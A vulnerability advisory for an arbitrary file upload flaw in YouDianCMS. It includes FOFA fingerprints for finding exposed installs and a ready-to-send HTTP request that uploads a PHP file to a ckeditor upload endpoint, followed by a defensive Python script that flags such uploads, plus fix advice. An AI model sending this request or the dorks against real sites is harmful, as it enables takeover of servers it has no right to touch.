Vulnerability description
The YouDianCMS (友点) system contains an arbitrary file upload vulnerability; an attacker can exploit it to gain control of the server.
Affected versions
YouDian Enterprise Website Management System (友点企业网站管理系统)
FOFA search keywords
icon_hash="1728964041"
app="友点建站-CMS"
Vulnerability reproduction
POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 185
Content-Type: multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2

--cadc403efc1ad12f5fcce44c172baad2
Content-Disposition: form-data; name="files"; filename="c.php"
Content-Type: image/jpg

<?php phpinfo();?>
--cadc403efc1ad12f5fcce44c172baad2--
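As an added example (not part of the advisory or of the CMS code), a small Python triage script that inspects a captured upload request to the endpoint above from the defender's side: it flags the upload when the extension is outside the image allowlist, when the declared image Content-Type is not backed by image magic bytes, and when the body carries a PHP open tag. The host name and the build_request helper are constructed sample data in the shape of the capture above.

```python
import re
from email.parser import BytesParser
from email.policy import default

# Constructed triage helper: inspects a captured multipart POST to the upload
# endpoint named in the advisory and reports why the upload should be blocked.
# Assumed: the request arrives as a raw HTTP/1.1 message from a proxy or WAF log.
UPLOAD_PATH = "/Public/ckeditor/plugins/multiimage/dialogs/image_upload.php"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def analyse_upload(raw: bytes) -> list[str]:
    """Return findings for one raw request; an empty list means nothing suspicious."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, path = request_line.decode("latin-1").split(" ")[:2]
    if method != "POST" or path.split("?")[0] != UPLOAD_PATH:
        return []  # only the image_upload.php endpoint is in scope here
    msg = BytesParser(policy=default).parsebytes(
        b"\r\n".join(header_lines) + b"\r\n\r\n" + body)
    findings = []
    for part in msg.iter_parts():
        fname = part.get_filename()
        if not fname:
            continue  # ordinary form field, not a file part
        ext = fname.rsplit(".", 1)[-1].lower() if "." in fname else ""
        data = part.get_payload(decode=True) or b""
        if ext not in ALLOWED_EXT:
            findings.append(f"{fname}: extension '{ext}' not in image allowlist")
        # The declared Content-Type is client-controlled; trust magic bytes instead.
        if part.get_content_type().startswith("image/") and not data.startswith(IMAGE_MAGIC):
            findings.append(f"{fname}: declared {part.get_content_type()} but no image magic bytes")
        if PHP_TAG.search(data):
            findings.append(f"{fname}: body contains a PHP open tag")
    return findings


def build_request(filename: str, ctype: str, data: bytes) -> bytes:
    """Constructed raw request in the shape of the advisory's capture (sample data only)."""
    boundary = b"cadc403efc1ad12f5fcce44c172baad2"
    body = (b"--" + boundary + b"\r\n"
            b'Content-Disposition: form-data; name="files"; filename="' + filename.encode() + b'"\r\n'
            b"Content-Type: " + ctype.encode() + b"\r\n\r\n" + data + b"\r\n--" + boundary + b"--\r\n")
    return (b"POST " + UPLOAD_PATH.encode() + b" HTTP/1.1\r\nHost: cms.example.internal\r\n"
            b"Content-Type: multipart/form-data; boundary=" + boundary + b"\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)
```

The same three checks, applied server-side before the file is written to disk, are the minimum fix for an upload handler like this one; blocking on any single finding is the safe default.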